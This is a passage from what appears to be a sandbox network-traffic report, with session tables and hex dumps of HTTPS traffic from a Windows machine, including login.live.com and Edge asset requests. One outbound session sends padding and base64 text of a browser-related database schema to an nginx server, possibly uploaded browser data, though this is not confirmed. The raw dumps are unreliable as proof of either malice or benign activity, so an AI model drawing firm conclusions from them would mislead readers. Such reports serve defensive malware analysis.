2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49791	20.190.181.0	443

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:03 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-29 11:28:03 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-29 11:28:04 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 29 Nov 2024 11:27:03 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C516_BAY x-ms-request-id: c29791f4-0553-4868-94ac-e121b839d85c PPServer: PPV: 30 H: PH1PEPF00012003 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 29 Nov 2024 11:28:03 GMT Connection: close Content-Length: 11390
2024-11-29 11:28:04 UTC	11390	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49793	13.107.246.63	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:04 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:05 UTC	557	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:05 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: b7b750df-e01e-000b-6b51-427073000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112804Z-174f7845968pf68xhC1EWRr4h8000000100g000000007hbv Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:05 UTC	15827	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6 Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp4'eD)q:
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37 Data Ascii: kD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-x$$QifD`7
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5 Data Ascii: sg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3 Data Ascii: MR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1 Data Ascii: yfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1 Data Ascii: b.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#
